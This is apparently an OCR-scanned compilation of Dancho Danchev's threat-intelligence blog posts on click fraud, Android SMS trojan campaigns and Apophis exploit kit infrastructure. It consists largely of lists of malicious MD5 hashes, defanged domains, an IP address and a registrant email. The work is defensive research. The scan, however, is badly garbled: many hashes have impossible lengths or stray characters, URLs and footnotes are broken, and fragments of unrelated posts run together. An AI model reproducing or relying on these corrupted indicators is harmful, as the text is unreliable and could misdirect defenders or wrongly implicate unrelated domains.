MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 


7fa7500cd90bd75ae52a47e5c18ba800 
84b28cf33dee08531ab6ece603ca92451 
f04ce06f5b1c89414cb1ff9219401a0e 
b2019625e4fd41ca9d70b07f2038803e 
6cfb98ac63b37C20529cC43923bcb257c 
04641dbafe3d12b00a6b0cd84fba557f 
02476b31f2cdc2b02b8ef1e0072d4eb2 
0d5a69fa766343f77630aa936bb64722 
577520b63958031336822926ed0d10b5 
00d08b163a86008cbe3349e4794ae3Cc0 
8dd2223dalad1a555361c67794eb7e24 
737309010740c2c1fba3d989233c199c 
e€b63043e13dd8bb34a4a8b75612fe401le 
e€b4737492d9abcc4bd43b12305c4b2fc 
6257b9c3239db33a6c52a8ecb2135964 
481366b6e867af0d47a6642e07d61f10 
d58b7158b3b1fb072098dba98dd82ed5 
9dd425b00b851f6c63ae069abbbec037 
6b0c07ce5ff1c3a47685f7be9793dce5 
b2b5e€82177a3beb917f9dd1a9a2cf91c 
05070da990475ac3e039783df4e503bc 
c332dd499cdba9087d0c4632a76c59f0 
0768764fbbeb84daa5641f099159ee7f 
843b44c77e47680aa4b274eeelaad4e7 
36f92066703690df1c11570633c93e73 
0504b00c51b0d96afd3bea84a9a242a2 
8bO0de5eabc27d37fa97d2b998ffd841la 
2944b1437d1e8825585eea3737216776 
fa13c7049ael4be0cf2f651fb2fa74ba 
ba5e47e0ed7b96a34b716caee0990ea3 
€67e56643f73ed3f6027253d9b5bdfac 
8b0de5eabc27d37fa97d2b998ffd841la 
2944b1437d1e8825585eea3737216776 
0ab654850416e347468a02ca5a369382 
4e372e5d1e2bd3fa68b85f6d1f861087 
696a9b85230a315cfe393d9335cae770 
04343c3269c33a5613ac5860ddb2ab81 
384a496cd4c2bc1327c225e19edbee54 
a44b2380cdac36f9dfb460f8fbff3714 
9e2a83adb079048d1c421afaf56a73ab6 
e377c7ad8ab55226e491d40bf914e749 
46c7c70e30495b4b60be1c58a4397320 
841890281b7216e8c8eal953b255881le 
4392f490e6ee553ff7a7b3c4bd1dd13f 
eeedab3bec6d2704cf6f77f2fb8431cd 
b68e183884ce980e300c93dfa375bb1f 
7990fb5c676bbcd0a6168ea0f8a0cld7 
adc250439474d38212773e161dadd6b4 
075ae09c01 6df3c7eb3d402d96fc2528 
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MD5: d03b5bf4a905879d9b93b6e81fc1ca55 
MD5: 00c62c8a9f2cf7140b67acec477e6al4 
MD5: b228fae216a9564192fa2153ae911d54 
MDS5: 2f778fc3a22b7d5feb0a357c850bdd0d 
MD5: 9080f3a0dfde30aa8afab64f7c3f5d79a 
MD5: 526c1f10f94544344del2abec96cf96f 
MD5: 4d8ddc8d5f6698a6690985ca86b3de00 
MD5: 1a7bb0c9b79d1604b4de5b0015202d02 
MD5: 528be69afad5a5e6beb7b40aeb656160 
MD5: 1769flb5beae58c09e5elaac9249f5de 
MD5: 6fb86421ea607ed6c912a3796739ce9b 
MD5: 22e€36b887946e457964a2a28a756alcd 
MD5: 31a7816a1458321736979e0cfdd3d20f 
MD5: 113572249856fc5f2848d1add06dc758 
MD5: a8a002732c5a4959afbf034d37992b5d 
MD5: 413a9116362ab8fb9ba622cc98Cc788b1 
MD5: 4abb29fe3ec3239d93f7adbc8cb70259 
MD5: 989bea3435e5ac5b8951baa07d356526 
MD5: 9a966076f114fbffc5cdbf5a90b3fd0l 
MD5: 14e64da2094ablaae13d162107c504ec 
MD5: 96bb6df37daef5b8de39ceaele3a7396 
MD5: d864369a0e8687ad3f89b693be84c8eb 
MD5: 26b8b2c06e1604daee6bfe783a82479e 
MD5: 63b922c94338862e7b9605546af2ef14 
MD5: 19ba1497f088d850bd3902288bb3bd92 
MD5: 96bb6df37daef5b8de39ceaele3a7396 
MD5: d864369a0e8687ad3f89b693be84c8eb 
MD5: 26b8b2c06e1604daee6bfe783a82479e 


Malicious MD5s known to have made HTTP (monetization) requests to the same IP 
(208.73.211.152): 

MD5: db0aac72ed6d56497e494418132d7a41 
MD5: aa47bd20f8a00e354633d930a3ebcb19 
MD5: a957e914f697639df7dfb8483a88483b 
MD5: a0b7b01a0574106317527e436e515fd3 
MD5: 3d0d834fe7ca583ca6ed056392f4413d 
MD5: fa342104b329978cba33639311lafe446 
MD5: f3b3e8b98bdfb6673da6d39847aec1b3 
MD5: 3ef52b2fd086094b591eb01bc32947c8 
MD5: 128e70484a9f19ab9096fb9b1 969bf89 
MD5: ee7dc2d2c7d33855b4dd86ae6243ad22 
MD5: 6fc317b6f66d73903ffe8d12df72e5f7 
MD5: 3800a4a6d6620aa15db7ea717b4d10f5 
MD5: 830bbfcaa499de30ab08a510ce4cbba2 
MD5: O085afd7f26f388bd62bc53ed430fbbc6 
MD5: 3035e120ce08f1824817e0d6eaecc806 
MD5: d4db511618c52272e58f4c334414ed6e 
MD5: dc4ab086d50dcdcd5ae060acfe9bddca 
MD5: c2bc9e266857537699fd10142658bf31 
MD5: 9e6ab643d34a6c37b6150aeb8a2e5adb 
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MD5: b6bb96470ef67c26c0a0e8a4d145c169 
MDS5: f5aa326e0b5322d7ac47a379elelclfs 
MDS5: dc0f5cO1d8deaabe9d57d31f9daf50b9 
MD5: 4a42c42e7acd9ff32ebb18efc2d5b801 
MD5: a254b2824867e05d52c60e0464121588 
MD5: 7e612f7ac81ccddb368d3c9e47c9942a 
MD5: 66cec28f23b692ff2019C70a76894c41 


This case is a great example of one of the core practices when profiling cybercrime inci- 
dents and campaigns -> sample everything, as what you’re originally seeing is just the tip of 
the iceberg. 


Related posts: 
[1]Click Fraud, Botnets and Parked Domains - All Inclusive 
[2]A Commercial Click Fraud Tool 


This post has been reproduced from [3]Dancho Danchev’s blog. Follow him 
[4Jon Twitter. 


1. http: //ddanchev. blogspot .com/2008/07/click-fraud-botnets-and-parked-domains.htm 
2. http://ddanchev.blogspot .com/2007/08/commercial-click-fraud-tool.htm 

3. http://ddanchev.blogspot.com/ 
4. 


ttp://twitter .com/danchodanche 


18.6.27 Rogue iFrame Injected Web Sites Lead to the AndroidOS/Fakelnst/Trojan- 
SMS.J2ME.JiFake Mobile Malware (2022-06-28 18:51) 


A currently ongoing malicious campaign relying on injected iFrames at legitimate Web sites, 
successfully [1]segments mobile traffic, and exposes mobile users to fraudulent legitimately 
looking variants of the AndroidOS/Fakelnst/Trojan-SMS.J2ME.JiFake mobile malware. 


Let’s dissect the campaign, expose the domains portfolio currently/historically known to 
have been involved in this campaign, as well as list all the malicious MD5s known to have 
been pushed by it. 


iFrame injected domains containing the mobile traffic segmentation script parked on 
the same IP: 

asphalt7-android.org - 93.170.109.193 

fifal2-android.org 

gta3-android.org 

fruit-ninja-android.org 

wildblood-android.org 

osmos-android.org 

moderncombat-android.org 

minecraft-android.org 
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i 


| Landing Page 


—_ 
i TWITTER 
4 


| Squeeze Page 


‘f 


Free Product 
Download 


Twitter 


The practice of [4]affiliate network fraud - excluding the cybersquatting as a prerequisite 
for it success - was recently mentioned as a much more lucrative fraudulent practice than 
the pay-per-click model, which entirely depends on the fraudster’s knowledge of which is the 
monetization model with the highest pay-out rates: 


"Some companies offer legitimate affiliate programs that allow third-party Web site owners to 
post links and banners with the company’s branded content on their site or to send traffic to 
the company’s site directly through domain forwards. In return, the owner of the site hosting 
the link receives a commission for every click-through that results in a purchase. This 
lucrative commission structure has enticed cybercriminals to take advantage of affiliate 
programs by registering typo domains that redirect to legitimate content and enable them to 
collect affiliate fees." 


Next to the malware/scareware serving Twitter campaigns, affiliate network fraud is also very 
common at the ever-growing micro-blogging service, whose lack of common sense account 
registration practices - Twitter doesn’t require a valid email, neither does it require an email 
confirmation upon registrating an account - makes the practice of generating bogus accounts 
a child’s play. 
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18.7.2 Historical OSINT - Profiling a Compilation of Known Apophis Exploit Kit C&C 
Public Domains - An OSINT Analysis (2022-07-01 20:55) 


[1] 


I’ve been recently digging into several archives in terms of looking for actionable threat intel- 
ligence based on my research circa 2010 with the idea to enrich it in 2022 and collerate it 
with several of my proprietary databases for threat intelligence and OSINT related materials 
in terms of fighting and responding to cybercrime hence the results which is an active domain 
portfolio of Apophis exploit and phishing kit which you can check out in terms of OSINT threat 
intelligence enrichment. 


Sample Apophis C &C domains circa 2010 based on my research include: 
hxxp://mystabcounter.info 
hxxp://555traff. biz 
hxxp://555traff.org 
hxxp://555traff.net 
hxxp://911traff.com 
hxxp://911traff.org 
hxxp://911traff.com 
hxxp://555traff.ws 
hxxp://nod32-spl.net 
hxxp://kusik-tusik-trf.com 
hxxp://spamhOuse.com 


hxxp://norton-av2007.com 
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The bottom line - is the managed blackhat SEO hosting service ( $500 per month and 
$5000 for one year for unlimited domains/subdomains/traffic/disk space package) the future, 
or are we going to continue seeing the systematic abuse of legitimate service’s infrastructure 
through outsourced CAPTCHA recognition? I’d go for the second due to a simple reason - it’s 
more cost-effective than the managed service at least for the time being. In the long term, 
once it achieves its logical "malicious economies of scale" the hosting and process would 
become cheaper thereby attracting more customers. 


Recommended reading - 

Outsourced CAPTCHA recognition: 

[5]Community-driven Revenue Sharing Scheme for CAPTCHA Breaking 
[6]The Unbreakable CAPTCHA 

[7]Spammers attacking Microsoft’s CAPTCHA - again 

[8]Spam coming from free email providers increasing 
[9]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers 
[10]Microsoft’s CAPTCHA successfully broken 

[11]Vladuz’s Ebay CAPTCHA Populator 

[12]Spammers and Phishers Breaking CAPTCHAs 

[13]DIY CAPTCHA Breaking Service 

[14]Which CAPTCHA Do You Want to Decode Today? 


Managed Cybercrime-facilitating services/tools: 
[15]Commercial Twitter spamming tool hits the market 
[16]Zeus Crimeware as a Service Going Mainstream 
[17]Managed Fast-Flux Provider 

[18]Managed Fast Flux Provider - Part Two 

[19]76Service - Cybercrime as a Service Going Mainstream 
[20]Inside (Yet Another) Managed Spam Service 

[21]Inside a DIY Image Spam Generating Traffic Management Kit 
[22]Quality Assurance in a Managed Spamming Service 
[23]Managed Spamming Appliances - The Future of Spam 
[24]Dissecting a Managed Spamming Service 

[25]Inside a Managed Spam Service 

[26]Spamming vendor launches managed spamming service 


Cybersquatting/Per Pay Click Fraud: 

[27]Exposing a Fraudulent Google AdWords Scheme 
[28]Botnets committing click fraud observed 

[29]Click Fraud, Botnets and Parked Domains - All Inclusive 
[30]Cybersquatting Security Vendors for Fraudulent Purposes 
[31]Cybersquatting Symantec’s Norton AntiVirus 

[32]The State of Typosquatting - 2007 


This post has been reproduced from [33]Dancho Danchev’s blog. 


1. http: //blogs.zdnet .com/security/?p=3549 
2. http: //ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving. htm 
3. http://blogs.zdnet .com/security/?p=183 
4. i 


http: //www.fairwindspartners.com/en/newsroom/press-releases/june- 22-2009 
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[2] 


@ 


slhdns@gmail.com 


é 


cl55. biz 


® 


bestcounter.biz 


oF oF 


bbf664bd279580aa7 1 7fcff0246b762c 0de4b76312dc0 1ff2d2f473465020619 


Sample domain registrant email address account known to have been used in the campaign: 
slhdns@gmail.com 


Related malicious and fraudulent domains known to have been involved in the campaign 
include: 


hxxp://free-adult-movies.us 
hxxp://ellweb.biz 
hxxp://flightlesson.us 
hxxp://e-on.us 
hxxp://masteryourselfandothers.biz 
hxxp://sexychannal.biz 
hxxp://fkooo. biz 
hxxp://le-showroom.biz 
hxxp://elwebbz.biz 
hxxp://sensorama.us 
hxxp://healingmassage.us 
hxxp://lisa19.biz 
hxxp://free-games-downloads. biz 
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hxxp://emaszyny.biz 
hxxp://free-bizzz. biz 
hxxp://ellwebs.biz 
hxxp://fsone.us 
hxxp://banddindependence.biz 
hxxp://freestylecamera.biz 
hxxp://wtter. biz 
hxxp://little-lolitas. biz 
hxxp://a-lexpress.us 
hxxp://sex-total. biz 
hxxp://misterfixit.us 
hxxp://pantie-fetish. biz 
hxxp://wantedbabes.biz 
hxxp://papmperedchef. biz 
hxxp://webmailccisd.us 
hxxp://funi-games. biz 
hxxp://karatzikos. biz 
hxxp://fuckphotos.biz 
hxxp://best-oem-sellers. biz 
hxxp://powerstocks. biz 
hxxp://connect-group. biz 
hxxp://pptsys.biz 
hxxp://lambrakis.biz 
hxxp://hsmvstatefl.us 
hxxp://computerselectronics.us 
hxxp://premierprop. biz 
hxxp://coloriez. biz 
hxxp://crazy-holiday.biz 
hxxp://images-porno.biz 
hxxp://talentsmodels.biz 
hxxp://sukebe.biz 
hxxp://taydo. biz 
hxxp://texas-holdem. biz 
hxxp://mr-rx.biz 
hxxp://cptraders. biz 
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hxxp://financialcareer. biz 
hxxp://smallgirls.biz 
hxxp://plastercrafts. biz 
hxxp://Ichs.us 
hxxp://poopka. biz 
hxxp://solarnet.biz 


hxxp://hormonetreatment.us 


hxxp://soammed.us 


hxxp://photos-pucelles. biz 


hxxp://signaturehomesstyles.biz 


hxxp://marbleworks. biz 
hxxp://simplyuniforms. biz 
hxxp://pinballsites. biz 
hxxp://cuyahogacouny.us 
hxxp://pinkpoodlepets. biz 
hxxp://cuyahagacounty.us 
hxxp://rachaels.biz 
hxxp://kentonkyschools.us 
hxxp://iginteinc.biz 
hxxp://caimon.us 
hxxp://lonestarjewelry. biz 
hxxp://vietghost.us 
hxxp://igniteing. biz 
hxxp://buytickets1.us 
hxxp://agame.biz 
hxxp://uighurlar. biz 
hxxp://joshosler.biz 
hxxp://variance.us 
hxxp://qudos. biz 
hxxp://ketsamil.us 
hxxp://quebecauction.biz 
hxxp://verumcom. biz 
hxxp://privatpornoz. biz 
hxxp://trasy. biz 
hxxp://fightnight.us 
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hxxp://trueterm. biz 
hxxp://arablusic.us 
hxxp://cdcover.us 
hxxp://httpimageshack.us 
hxxp://iprosper.us 
hxxp://prepaid2u.biz 
hxxp://kylakeproperty.us 
hxxp://printsmart.us 
hxxp://inmarcet.biz 
hxxp://privatevoicemail.us 
hxxp://koicarp.us 
hxxp://11burogu.biz 
hxxp://traivan.us 
hxxp://eroxia.us 
hxxp://assmat. biz 
hxxp://sauvageonne. biz 
hxxp://articlexchange. biz 
hxxp://scottsphotography. biz 
hxxp://project-management-tools.biz 
hxxp://mini-games. biz 
hxxp://aqarium-fish. biz 
hxxp://imageashack.us 
hxxp://beanb. biz 
hxxp://rmpnfotec. biz 
hxxp://azadari.biz 
hxxp://europauto.biz 
hxxp://autosourse. biz 
hxxp://rowanlaw.us 
hxxp://autocadsites.biz 
hxxp://renewpcstore. biz 
hxxp://whatswhat.us 
hxxp://fOreverhealthy. biz 
hxxp://boa-constrictor.biz 
hxxp://f-chan.us 
hxxp://bestemateur. biz 
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hxxp://everysearch.us 
hxxp://wnetwork. biz 
hxxp://fanmial.biz 
hxxp://brutalfemdom.biz 
hxxp://realitywise. biz 
hxxp://breadmaker. biz 
hxxp://realy-models. biz 
hxxp://webform.us 
hxxp://lolabbs.biz 
hxxp://weknow.us 
hxxp://jlove.us 
hxxp://zowmebel.biz 
hxxp://L001night.biz 
hxxp://zodiacpowerring. biz 
hxxp://wwwsignaturehomestyles.biz 
hxxp://a-deco.biz 
hxxp://analized.us 
hxxp://ishikari.biz 
hxxp://xteenx.biz 
hxxp://ffivideo.biz 
hxxp://allthingscatholic.us 
hxxp://puffgames. biz 
hxxp://actiongames.us 
hxxp://ffunny-games. biz 
hxxp://coasthomes. biz 
hxxp://clearhabor. biz 
hxxp://at-crew. biz 
hxxp://animal-info. biz 
hxxp://anoria.biz 
hxxp://cl55.biz 
hxxp://amitenergy.biz 
hxxp://bestcounter. biz 
hxxp://bionexus. biz 
hxxp://4only. biz 
hxxp://bellgard.biz 
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hxxp://bairo. biz 
hxxp://banjosites. biz 
hxxp://clthumane.biz 
hxxp://autorepairmanuels. biz 
hxxp://city-info. biz 
hxxp://anywhere-wireless.biz 
hxxp://casadellabomboniera.biz 
hxxp://centerforrenewal.biz 
hxxp://cuteloblog. biz 
hxxp://buckneranimalclinic. biz 
hxxp://bona-stto. biz 
hxxp://1sp.biz 
hxxp://easycalender.biz 
hxxp://etudiantes-vicieuses.biz 
hxxp://fannygames.biz 
hxxp://bizibypass.biz 
hxxp://ddl-warez. biz 
hxxp://fainmail.biz 
hxxp://farmersandmerchantsbank.biz 
hxxp://atomakayan.biz 
hxxp://youxxx.us 
hxxp://wmata.us 
hxxp://mailarlingtonva.us 
hxxp://sexyblackpussy. biz 
hxxp://funnygamse.biz 
hxxp://funnygaes.biz 
hxxp://freetgp. biz 
hxxp://www4usonly.biz 
hxxp://hena. biz 
hxxp://gentrees. biz 
hxxp://ignitein. biz 
hxxp://hentai-movie.biz 
hxxp://igniteic. biz 
hxxp://neadcutterssalon.biz 
hxxp://fuunny-games. biz 
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hxxp://igniteenergy. biz 
hxxp://hrna.biz 
hxxp://free-voyeur-cam.biz 
hxxp://goldenretire. biz 
hxxp://inkkraft. biz 
hxxp://heproject.biz 
hxxp://funny-gemes. biz 
hxxp://ice-out. biz 
hxxp://adogslife.biz 
hxxp://alterego3d.biz 


hxxp://americanriverbikes. biz 


hxxp://ecstazy. biz 
hxxp://harna.biz 


hxxp://africantradebeads.biz 


hxxp://funy-game. biz 
hxxp://free-gay-movies.biz 
hxxp://inginteinc. biz 
hxxp://wwwsexbabes.biz 
hxxp://wwwmoscarossa. biz 
hxxp://wwwsearch. biz 
hxxp://funygame.biz 
hxxp://fuuny-game. biz 
hxxp://e-dict. biz 
hxxp://interskay. biz 
hxxp://bbw-fat-woman.biz 
hxxp://sexbabs. biz 
hxxp://youniquedesigns.biz 
hxxp://visiongloval.biz 
hxxp://seekme. biz 
hxxp://pamperedcheff.biz 
hxxp://streetdrugs. biz 
hxxp://northportrealtor. biz 
hxxp://young-peaches. biz 
hxxp://boysvids.us 


hxxp://coolchasers.us 
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hxxp://avse.us 
hxxp://clearsil.us 
hxxp://celebmovie.us 
hxxp://myffl. biz 
hxxp://sexbabez. biz 
hxxp://sexbabies.biz 
hxxp://free-search.biz 
hxxp://free-voyeur-web. biz 
hxxp://sukuname. biz 
hxxp://mattun. biz 
hxxp://wmclick.biz 
hxxp://jun1.biz 
hxxp://try-this-search. biz 
hxxp://best-search.us 
hxxp://topkds. biz 
hxxp://traffmoney.biz 
hxxp://no-nudes. biz 
hxxp://ownmyhome.us 
hxxp://teenboyboy. biz 
hxxp://may5.biz 
hxxp://kisslola. biz 
hxxp://mature-sex-pic. biz 
hxxp://logocorean. biz 
hxxp://medsbymail.biz 
hxxp://melissacam.biz 
hxxp://mcommuniti.biz 
hxxp://katreen.biz 
hxxp://nextdoorteens.us 
hxxp://viasatelital.us 
hxxp://onestoplettingshop. biz 
hxxp://hotmapouka. biz 
hxxp://agsoftware. biz 
hxxp://bun1.biz 
hxxp://bsabikesites. biz 
hxxp://fragments.biz 
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hxxp://lovely-nymphets. biz 
hxxp://proliferator. biz 
hxxp://puertolaboca.us 
hxxp://blackandpussy.biz 
hxxp://ford-dealers.biz 
hxxp://hlplmanhds. biz 
hxxp://baosteel.biz 
hxxp://begard.biz 
hxxp://erotik-geschichten. biz 
hxxp://djahmet.biz 
hxxp://fonny-games. biz 
hxxp://togetherwestand.us 
hxxp://fantasy4u.us 
hxxp://tympani.us 
hxxp://victoryautosales.us 
hxxp://veld.us 
hxxp://hartlandschool.us 
hxxp://whisperedsecrets.us 
hxxp://receptor.us 


hxxp://sese.us 


hxxp://industrialwoodproducts.us 


hxxp://cutyourexpenses.us 
hxxp://first-school.us 
hxxp://cutexpenses.us 
hxxp://future4.us 
hxxp://tvdirectory.us 
hxxp://fashioncamp.us 
hxxp://madebyyou.us 
hxxp://justleather.us 
hxxp://iamhot.us 
hxxp://datedetective.us 
hxxp://phonetranslators.us 
hxxp://eurosport.us 
hxxp://lloll.us 


hxxp://embelsira.us 
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hxxp://mainsqueezelove.biz 
hxxp://privatporn. biz 
hxxp://porn-photo. biz 
hxxp://radim.us 
hxxp://porn-fotos.biz 
hxxp://niceleads. biz 
hxxp://spaceresort.us 
hxxp://filmscore.us 
hxxp://hatachi.us 
hxxp://lanciasites. biz 
hxxp://needcracks.us 
hxxp://muddle.us 
hxxp://negaheno. biz 
hxxp://truyennguoilon.us 
hxxp://net-gams.biz 
hxxp://videospornoblog. biz 
hxxp://chezbaycakes. biz 
hxxp://vb3.biz 
hxxp://n0-ip.biz 
hxxp://nailwarehouse. biz 
hxxp://mynameislolita.biz 
hxxp://mountainlakeresort.us 
hxxp://hardcore-family-incest. biz 
hxxp://hi-web.biz 
hxxp://passace.com 
hxxp://smartergirl.com 
hxxp://howtofixyourharley.com 
hxxp://sirevil.us 
hxxp://mychices. biz 
hxxp://sfondipc.biz 
hxxp://wealth-4-u.biz 
hxxp://avenge. biz 
hxxp://arlingonva.us 
hxxp://americawide.us 
hxxp://11xp.us 
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5. http: //ddanchev. blogspot. com/2009/02/community-driven-revenue-sharing-scheme.htm 


http: //ddanchev.blogspot .com/2008/07/unbreakable- captcha. htm 


6. 

7. 

8. 

2: 

10, 

12. 
13 


14. http://ddanchev. blogspot .com/2007/11/which-captcha-do-you-want-to-decode.htm 


15. http://blogs.zdnet .com/security/?p=247 


16. http://ddanchev. blogspot .com/2008/12/zeus-crimeware-as-service-going. htm 


17. http://ddanchev. blogspot .com/2007/11/managed-fast-flux-provider.htm 
18. http://ddanchev. blogspot .com/2008/10/managed-fast-flux-provider-part-two.htm 


19. http://ddanchev. blogspot . com/2008/08/76service-cybercrime-as-service-going. htm 


20. http: //ddanchev. blogspot . com/2009/03/inside-yet-another-managed-spam-service.htm 


21. http: //ddanchev. blogspot .com/2009/02/inside-diy- image-spam- generating. htm 

22. http://ddanchev. blogspot . com/2009/02/quality-assurance- in-managed- spamming . htm 
23, 
24. http: //ddanchev. blogspot . com/2008/07/dissecting-managed- spamming-service .htm 
25, 

26. 

27. 
28. 

29. http://ddanchev. blogspot . com/2008/07/click-fraud-botnets-and-parked-domains .htm 
30. 
31. 

32. 

33, 


5.6.11 Ethiopian Embassy in Washington D.C Serving Malware - Part Two 
(2009-06-25 14:01) 


Can a lightning strike the same place twice? In the world of cybercrime, there’s no such 
thing as a coincidence especially when it comes to multiple malware embedded embassy web 
sites during the past couple of months courtesy of a single group, with soft-drinks themed 
redirectors establishing a direct connection with a well known RBN domain from the not so 
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hxxp://arlintonva.us 
hxxp://animefans.us 
hxxp://genescan.us 
hxxp://hallmarkkeepsake.com 
hxxp://sundaramusic.com 
hxxp://gros-culs.biz 
hxxp://moneyconnection.biz 
hxxp://graephillips.biz 
hxxp://wwwbiehealth.us 
hxxp://hollywoodmadam.us 
hxxp://enblock.biz 
hxxp://oynuyoruz.biz 
hxxp://sexbabys. biz 
hxxp://nop-ip.biz 
hxxp://klinische-forschung.biz 
hxxp://grupxtrem. biz 
hxxp://vestalgirls.biz 
hxxp://nudeliving.us 


hxxp://buellsites. biz 


hxxp://mcclaincountyassessor.us 


hxxp://went2.us 
hxxp://mcpsk12md.us 
hxxp://muenzversand.biz 
hxxp://nighteen. biz 
hxxp://customelectronics.us 
hxxp://hocsinhvn.biz 
hxxp://city-realtor. biz 
hxxp://no-p.biz 
hxxp://transsahara.biz 
hxxp://net-ganes.biz 
hxxp://bevardclerk.us 
hxxp://netgamez.biz 
hxxp://nealthfoodsstore.us 
hxxp://hiphopcharts.us 


hxxp://ebookgenerator.biz 
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hxxp://ni-ip.biz 
hxxp://dataspot.biz 
hxxp://moregirls. biz 
hxxp://uscharts.us 
hxxp://pampredchef.biz 
hxxp://carefreehomesep.us 
hxxp://fuun-games. biz 
hxxp://kellyeducationalservices.us 
hxxp://hollywoodsbest.us 
hxxp://vintage-furniture.us 
hxxp://pamperedche. biz 
hxxp://cinacast.us 
hxxp://gethitsfrom.us 
hxxp://celebrityfuckfest. biz 
hxxp://gentle-boys.biz 
hxxp://trique-porno.biz 
hxxp://pamperedchf.biz 
hxxp://carwithheart. biz 
hxxp://pamparedchef.biz 
hxxp://soccersites.biz 
hxxp://pamperchief. biz 
hxxp://cutmyexpenses.us 
hxxp://girlsseekingboys.com 
hxxp://curiosity-shop.biz 
hxxp://pamperedcef. biz 
hxxp://thebookpeddler.us 
hxxp://ozgurboard.us 
hxxp://deshimasala.biz 
hxxp://pamepredchef.biz 
hxxp://shopedmap.biz 
hxxp://goshoppingnow.biz 
hxxp://dailycash. biz 
hxxp://pamoeredchef.biz 
hxxp://sleepygirls.us 
hxxp://sexpain.biz 
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hxxp://japanese-kimonos.biz 
hxxp://kwbw.biz 
hxxp://knifesites. biz 
hxxp://top-girlie.biz 
hxxp://pcconnect.biz 
hxxp://tiket2u. biz 
hxxp://magicvideo. biz 
hxxp://tankslapper.biz 
hxxp://wolrdventures. biz 
hxxp://555traff. biz 
hxxp://assitante-maternelle. biz 
hxxp://ambitenrgy.biz 
hxxp://wcw2008.com 
hxxp://yourxxxblog. biz 
hxxp://Is-dreams.biz 
hxxp://deai-joho. biz 
hxxp://theadvanced348pills. biz 
hxxp://privatporns. biz 
hxxp://worldaventures. biz 
hxxp://max-models. biz 
hxxp://majornet.biz 


hxxp://worldventrures. biz 


hxxp://realincome4realpeople. biz 


hxxp://miffi.biz 
hxxp://lolitaskingdom. biz 
hxxp://ratemyass. biz 
hxxp://themillenium.biz 
hxxp://love2005.biz 
hxxp://worldventuers. biz 
hxxp://worldventues.biz 
hxxp://provoke. biz 
hxxp://realadvanced348pills.biz 
hxxp://wwwpartylite. biz 
hxxp://armorgames.biz 


hxxp://lampsites.biz 
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hxxp://labtesting. biz 
hxxp://zagevqsoii.biz 
hxxp://wwwherna.biz 
hxxp://wwwsmartvalue.biz 
hxxp://premierorlandoshow.biz 
hxxp://xtremescooters.biz 
hxxp://pharmaceu. biz 
hxxp://patylite. biz 
hxxp://pianosites. biz 
hxxp://xgarden. biz 
hxxp://xmature. biz 
hxxp://wwwpamperedchef. biz 
hxxp://logocorea. biz 
hxxp://traffstats. biz 
hxxp://myspaze. biz 
hxxp://smartvalu. biz 
hxxp://myangelfuns.biz 
hxxp://pfshop. biz 
hxxp://sinon.biz 
hxxp://partylight. biz 
hxxp://piscali.biz 
hxxp://ventriloserver.biz 
hxxp://vintage-lingerie. biz 
hxxp://busybee-discounts.biz 
hxxp://mycoices. biz 
hxxp://tstats. biz 
hxxp://rmpinfotecc.biz 
hxxp://ruslolitas. biz 
hxxp://only4us. biz 
hxxp://rmpinfote. biz 
hxxp://mo-ip.biz 
hxxp://pamperechef. biz 
hxxp://superfreak.biz 
hxxp://mychoises.biz 
hxxp://pamperedcheif. biz 
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hxxp://rockOem. biz 
hxxp://videonymphets. biz 
hxxp://lovers-lane.biz 
hxxp://rmpinfotac. biz 
hxxp://wisconsinapartment. biz 
hxxp://sweet-girls. biz 
hxxp://pameredchef. biz 
hxxp://whiteslave. biz 
hxxp://nerohona.biz 
hxxp://minecharm.biz 
hxxp://skysat. biz 
hxxp://boxmain. biz 
hxxp://dynds.biz 
hxxp://dremer.biz 
hxxp://dragonpalace.biz 
hxxp://doina-sirbu.biz 
hxxp://4useonly. biz 
hxxp://cccp-top. biz 
hxxp://panoromicworld. biz 
hxxp://ganntproject. biz 
hxxp://sextop.biz 
hxxp://pamperedhef. biz 
hxxp://virtualzone. biz 
hxxp://serendipityboutique. biz 
hxxp://photololita.biz 
hxxp://parylite. biz 
hxxp://rmpinfotce.biz 
hxxp://partlite. biz 
hxxp://panperedchef. biz 
hxxp://sexlagoon.biz 
hxxp://mcmmunity. biz 
hxxp://statrafongon.biz 
hxxp://stockservice.biz 
hxxp://jobsinmotors.biz 


hxxp://torrent-portal. biz 
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hxxp://simwork.biz 
hxxp://simmaster.biz 
hxxp://partyite. biz 
hxxp://opse. biz 
hxxp://shocknews. biz 
hxxp://worldvenures. biz 


hxxp://funnigames.biz 


[3] 


oF 3: 


014aGe2a4cc62df769c923f236f2934e c7a23509862497f743401946fd63ca25b 


iG 


5c85291991 5Sbbad976fef4165b3f4800 


Sample malicious MD5s known to have been involved in the campaign include: 
375e8a6dd1b666f09f3602ed2e8e05eb 
4634d5e104a26616b6666a43b5b1416c 
014a6e2a4cc62df769C923f236f2934e 
€7a2350a62497f743401946fd63ca25b 
b118c68b72595f9c15bdce8fc7 7fea37 
a616b67adbdad8870e751384dd070db5 
ccd7b6b6a59bb9925e0af66d60dele6d 
d4627cf4de6a5905dde5df2e69f8944b 
0de4b76312dc01ff2d2f473465020619 
5ca52919915bbad976fef4165b3f4800 
381b27cb8b9976e6820345a49d93fc3b 
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3cab5169156f2d062b84c519cf2b1802 
bbf664bd279580aa717fcff0246b762c 
06d0c3af7b80ea0001a5270d59348282 
e4e494eff71ad9f14b1a369522fb4c94 
Stay tuned! 


1, fittps:/ blogger. googleusercontent .con/ing/b/RO0v22x1/ AVWKSE j= bp XVTv Jul 62jON2F 28 yaSRFopkvgKjt9B0u0R-X 
2. https: / blogger. googleusercontent .con/ing/o/R29v22x1,/ AVWKsEj62¥2 cA vPizokatOd ny OUTHTORKEv=0C3=hKutS-d 
3. https: //bLogger.googleusercontent.con/ing/o/R29v22x1/AVWXsEADDKEcaSTotcAgd_77HEsOn62XWCLv1 UAL g6/DDB2¥F0Gz 


18.7.3 Time to Say Goodbye! (2022-07-06 21:56) 


[1] 


Ho, Ho, Ho. 

Merry Christmas or Christmas just came in earlier. 

This is an official letter to all of my 5.6M readers since December, 2005 including an official 
letter to the U.S Security Industry including my current colleagues and friends from across the 
globe including the dark corners of the Web although there’s no such thing as a dark corner of 
the web just like there’s no such thing as free lunch including the fact that an OSINT conducted 
